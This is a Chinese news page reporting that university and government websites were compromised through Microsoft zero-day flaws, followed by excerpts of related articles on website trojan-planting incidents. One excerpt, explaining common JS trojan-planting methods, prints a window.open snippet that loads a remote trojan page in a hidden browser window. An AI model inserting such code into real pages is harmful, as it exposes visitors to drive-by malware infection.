复旦交大等高校网被黑客挂马

东方早报记者 单芸 顾文剑 实习生 张小叶  近日,微软被曝“MPEG-2视频”和“Office内存破坏”两大0Day漏洞,导致包括复旦、交大在内的全国41家知名高校的网站和36家政府网站被挂马。截至目前,微软“Office内存破坏”0Day漏洞,至今仍未发布补丁。  一漏洞补丁仍未发布  网络安全界专家表示,0day是指官方还没有公布补丁的漏洞。因为这种漏洞的利用程序对网络安全具有巨大威胁,所以0day是黑客的最爱。  7月7日,微软公司向全球用户发布最新安全通告,证实了Windows XP、Windows2003等操作系统存在“MPEG-2视频”这个0Day漏洞。7月10日,国内一杀软公司监控显示,微软“MPEG-2视频0Day漏洞”引发了复旦、交大的23家高校网的部分网页被挂马。7月15日,微软发布7月份安全更新公告,包含6个漏洞补丁,可修复“MPEG-2视频漏洞,”但是,没有针对“Office内存破坏”漏洞的修复补丁。  近1%中文网站被挂马  网络安全专家表示,“Office内存破坏”0day漏洞存在于Office网页组件“OCW10.dll”中,黑客如果以特定序列使用该漏洞组件的方法调用浏览器窗口对象,就会触发内存破坏从而导致执行任意代码。该漏洞目前主要影响Windows XP系统下的Office2000及以后的所有版本。  安装以上微软Office软件的网民,当使用IE6、IE7或使用IE内核的浏览器访问利用该0Day漏洞的“挂马网页”时,暗藏在网页中的攻击代码就会把包括盗账号、窥隐私、弹广告、远程控制等各种木马程序偷偷下载到网民电脑中,致使网民电脑随时都有网银、网游、QQ账号等数字财产失窃的风险,甚至成为任人摆布的“肉鸡”。  7月15日,国内某安全厂商的不完全统计,已有超过20000家网站被黑客利用“MPEG-2视频”漏洞及“Office内存破坏”漏洞挂马,在中文网站中接近1%的比例,甚至出现了36家政府网站、41家高校网站集体被挂马的现象。  中毒表现:网页卡住防火墙报警  上周,复旦大学的网页遭到黑客挂马攻击,导致复旦大学经济学院网站的部分链接失效。  复旦经院的一名学生王同学告诉记者,7月17日,他的室友进入过复旦大学经济学院(http://www.econ.fudan.edu.cn)的网站,点击首页中的链接“教师名录”后,发现网页卡住,无法正常运行。这样的情况持续三日,直到20日方才恢复正常。  昨日22时,记者进入经济学院的网站后发现,“教师名录”这一链接仍无法正常运行。防火墙显示有名为Script-inf的病毒攻击,随即中止了该网页的下载。

时间: 2024-09-27 04:52:16

复旦交大等高校网被黑客挂马的相关文章

赛迪网被黑客挂马

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 23日消息,据悉,超级巡警团队今日监控到赛迪网部分页面被黑客植入木马.赛迪网的部分页面嵌入了该脚本www.ccidnet.com/images/image_service/blank_news.js,black_news.js内被黑客植入恶意代码,因此所有嵌入black_news.js的页面都将受到本次挂马时间的影响. 此次挂马事件除利用了以

奇虎网否认遭黑客挂马称其网站没有漏洞

网易科技讯 7月9日消息,安全软件厂商瑞星发布警告称,奇虎.北斗论坛.广捷居等网站有页面昨日遭到黑客挂马.对于这一说法,奇虎网发表声明称:"瑞星的挂马新闻播报是失实的",奇虎网称奇虎网站没有漏洞,也没被挂马. 瑞星今日发布的警告称,"奇虎"被挂马页面地址为w.qihoo.com/frame/q2431011,7f9145,2367_15523.html,该页面引用了一个网民的博客,黑客正是利用目前最新的微软视频漏洞进行挂马,用户一旦访问后IE浏览器会崩溃,甚至可能感

瑞星警告称奇虎网等网站被黑客挂马

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 7月9日消息,据安全软件厂商瑞星报告,奇虎.北斗论坛.广捷居等网站有页面昨日遭到黑客挂马,黑客利用的正在疯狂利用微软最新的视频漏洞. 瑞星称,"奇虎"被挂马页面地址为w.qihoo.com/frame/q2431011,7f9145,2367_15523.html,该页面引用了一个网民的博客,黑客正是利用目前最新的微软视频

大型知名网站频遭黑客挂马

本周瑞星共截获166万个挂马网址.挂马网站针对的都是一些大型的知名网站,中华英才网.中国书画苑.四川新闻网的部分页面被黑客挂马. 近期关注病毒:MS08-067漏洞病毒变种MD(Hack.Exploit.Win32.MS08-067.md),警惕程度★★★.病毒会关闭多个国外主流杀毒软件,通过系统默认共享感染局域网中的电脑.病毒还会定期下载大量木马. 防范方法:升级瑞星全功能安全软件2009:安装卡卡上网安全助手自动修复漏洞:拨打反病毒急救电话82678800或登录http://help.ris

常见JS挂马方法及如何防止网站被黑客挂马?

一.常见JS挂马方法 现在最多见的JS挂马方法有两种,一种是直接将JavaScript脚本代码写在网页中,当访问者在浏览网页时,恶意的挂马脚本就会通过用户的浏览器悄悄地打开网马窗口,隐藏地运行. 这种方法使用的关键代码如下: window.open("http://www.mahaixiang.cn/木马.html","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro ll

NBA明星个人网站被黑客挂马

本报讯 (记者 段郴群) 记者昨日获悉,据瑞星"云安全"系统监测, 6月29日,篮球网旗下的"科比中文网"."韦德中文网"."姚明中文网"等NBA著名球员的个人网站被黑客挂马.球迷访问这些网站后,会立即感染木马病毒Trojan.Win32.Generic.11E996E5(AV终结者木马),导致电脑异常,信息被盗. 瑞星安全专家提醒说,"云安全"系统在6月29日拦截了112万次挂马网站对用户的攻击.截至发稿

黑客挂马紧盯娃娃 儿童节育儿教育网站被挂马

据瑞星"云安全"系统监测,5月31日,"39健康育儿网"."好得网教育频道"."湖南教育资源门户网-湘教在线"等大型教育网站被黑客挂马,用户浏览这些网站后,会感染木马病毒:Backdoor.Win32.Gpigeon2007.cym(灰鸽子后门病毒),可能会被黑客远程控制. 瑞星安全专家提醒说,随着六一国际儿童节的临近,黑客对育儿.教育网站进行挂马是有明显目的的.网民上网时应安装带有"防挂马"功能的瑞星全功

热门视频网站成为黑客挂马攻击对象

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 据瑞星"云安全"系统统计,上周瑞星共截获了135万个挂马网址,主要是一些1158.html">在线视频.娱乐八卦和女性网站.近期,随着<变形金刚2>的热映与迈克尔·杰克逊病逝等事件成为广大网民关注的热点,大量网民访问视频网站收看预告片或追忆明星生前的经典影音,所以这些视频网站成为黑客挂马攻击对象

热门视频网站成黑客挂马攻击对象

据瑞星"云安全"系统统计,上周瑞星共截获了135万个挂马网址,主要是一些在线视频.娱乐八卦和女性网站.近期,随着<变形金刚2>的热映与迈克尔·杰克逊病逝等事件成为广大网民关注的热点,大量网民访问视频网站收看预告片或追忆明星生前的经典影音,所以这些视频网站成为黑客挂马攻击对象. 在这些挂马网站中截获的一个病毒值得注意,它是Trojan.Win32.FakeAV.ri(杀软伪造者木马),该病毒会修改系统文件,伪造成一个国外杀毒软件,欺骗用户电脑中有病毒,清除则需付费,使得部分用